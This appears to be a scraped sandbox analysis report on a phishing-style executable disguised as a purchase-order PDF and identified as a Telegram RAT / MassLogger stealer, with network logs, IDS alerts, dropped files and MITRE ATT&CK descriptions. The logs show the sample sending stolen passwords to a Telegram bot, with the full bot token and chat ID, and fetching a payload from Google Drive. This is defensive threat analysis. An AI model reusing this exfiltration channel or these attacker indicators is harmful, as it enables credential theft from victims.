Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21359d38fd7bHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21a2e32dbc29Host: api.telegram.orgContent-Length: 1090

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.186.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PURCHASE ORDER TRC-0909718-24_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi\wildwestfilm.sto

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Mixoploid189\forskansningens.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Mixoploid189\fyldebtten.soi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Ozena.Soc

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Riprap43.gaw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\kasteskyts.Mor

C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Benchership141.lnk

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
PURCHASE ORDER TRC-0909718-24_pdf.exe

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
libraryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre